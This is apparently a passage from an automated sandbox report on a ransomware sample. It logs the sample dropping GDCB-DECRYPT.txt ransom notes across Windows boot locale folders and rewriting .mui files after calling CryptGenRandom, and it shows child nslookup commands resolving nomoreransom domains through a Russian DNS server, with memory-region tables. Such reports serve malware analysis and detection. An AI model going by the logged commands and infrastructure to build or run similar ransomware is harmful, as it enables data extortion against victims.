| File | Create | filename = C:\Boot\sr-Latn-RS\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\sv-SE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\sv-SE\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\sv-SE\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\sv-SE\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\sv-SE\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\sv-SE\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\tr-TR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\tr-TR\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\tr-TR\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\tr-TR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\tr-TR\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\tr-TR\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\uk-UA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\uk-UA\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\uk-UA\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\uk-UA\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\zh-CN\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\zh-CN\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\zh-CN\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\zh-CN\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\zh-CN\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\zh-CN\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\zh-HK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\zh-HK\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\zh-HK\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\zh-HK\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\zh-HK\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\zh-HK\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\zh-TW\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\zh-TW\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\zh-TW\bootmgr.exe.mui, type = file_attributes |
|
1 |
Process #7: nslookup.exe
9
24
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup nomoreransom.coin dns1.soprodns.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa60 |
| Parent PID | 0xbc8 (c:\users\5jghkoaofdp\appdata\roamingeox20.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| nslookup.exe | 0x008e0000 | 0x008f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b7ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00b83fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00b91fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00b92fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00baefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000bb0000 | 0x00bb0000 | 0x00beffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00c2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c33fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000c40000 | 0x00c40000 | 0x00c40fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00c51fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00c60000 | 0x00cddfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ce0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x00cf0000 | 0x00d11fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00f7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000f80000 | 0x00f80000 | 0x010c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000010d0000 | 0x010d0000 | 0x01257fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| winrnr.dll | 0x74180000 | 0x74188fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74190000 | 0x741a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x741b0000 | 0x741c3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x741d0000 | 0x741dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x743d0000 | 0x74413fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74420000 | 0x74426fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74560000 | 0x745dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x745e0000 | 0x745e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x745f0000 | 0x7460dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x748d0000 | 0x74914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74dd0000 | 0x74e22fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74e30000 | 0x74e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74e40000 | 0x74e5cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74f70000 | 0x75020fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75180000 | 0x752cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75320000 | 0x7536cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76520000 | 0x7665ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766f0000 | 0x767befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x76880000 | 0x7693dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76940000 | 0x7697dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x76bc0000 | 0x76cc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x76cd0000 | 0x76dc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76e60000 | 0x76e84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76fe0000 | 0x76fe6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x77340000 | 0x77388fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x77390000 | 0x77398fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x773a0000 | 0x77407fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77410000 | 0x77577fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f580000 | 0x7f580000 | 0x7f67ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007f680000 | 0x7f680000 | 0x7f6a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f6ab000 | 0x7f6ab000 | 0x7f6adfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007f6ae000 | 0x7f6ae000 | 0x7f6aefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007f6af000 | 0x7f6af000 | 0x7f6affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc731fffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc733aa000 | 0x7ffc733aa000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0xa2c
9
24
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x8e0000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = FiVauf |
|
1 | |
| DNS | Resolve Name | host = dns1.soprodns.ru, address_out = 31.41.44.99 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 42, size_out = 42 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 34 |
|
1 |
Process #9: nslookup.exe
9
24
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup nomoreransom.bit dns1.soprodns.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8ec |
| Parent PID | 0xbc8 (c:\users\5jghkoaofdp\appdata\roamingeox20.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000007c0000 | 0x007c0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007cffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007d3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x007e2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x007fefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0083ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00883fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00890fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008a1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| nslookup.exe | 0x008e0000 | 0x008f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| locale.nls | 0x00900000 | 0x0097dfff | Memory Mapped File | Readable |
|
|
|
- |
| imm32.dll | 0x00980000 | 0x009a1fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00c6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000c70000 | 0x00c70000 | 0x00db1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dcffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000dd0000 | 0x00dd0000 | 0x00f57fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| winrnr.dll | 0x74180000 | 0x74188fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74190000 | 0x741a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x741b0000 | 0x741c3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x741d0000 | 0x741dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x743d0000 | 0x74413fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74420000 | 0x74426fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74560000 | 0x745dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x745e0000 | 0x745e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x745f0000 | 0x7460dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x748d0000 | 0x74914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74dd0000 | 0x74e22fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74e30000 | 0x74e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74e40000 | 0x74e5cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74f70000 | 0x75020fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75180000 | 0x752cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75320000 | 0x7536cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76520000 | 0x7665ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766f0000 | 0x767befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x76880000 | 0x7693dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76940000 | 0x7697dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x76bc0000 | 0x76cc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x76cd0000 | 0x76dc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76e60000 | 0x76e84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76fe0000 | 0x76fe6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x77340000 | 0x77388fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x77390000 | 0x77398fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x773a0000 | 0x77407fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77410000 | 0x77577fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007e450000 | 0x7e450000 | 0x7e54ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007e550000 | 0x7e550000 | 0x7e572fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007e576000 | 0x7e576000 | 0x7e576fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007e57c000 | 0x7e57c000 | 0x7e57cfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007e57d000 | 0x7e57d000 | 0x7e57ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc731fffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc733aa000 | 0x7ffc733aa000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x5fc
9
24
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x8e0000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = FiVauf |
|
1 | |
| DNS | Resolve Name | host = dns1.soprodns.ru, address_out = 31.41.44.99 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 42, size_out = 42 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 34, size_out = 34 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
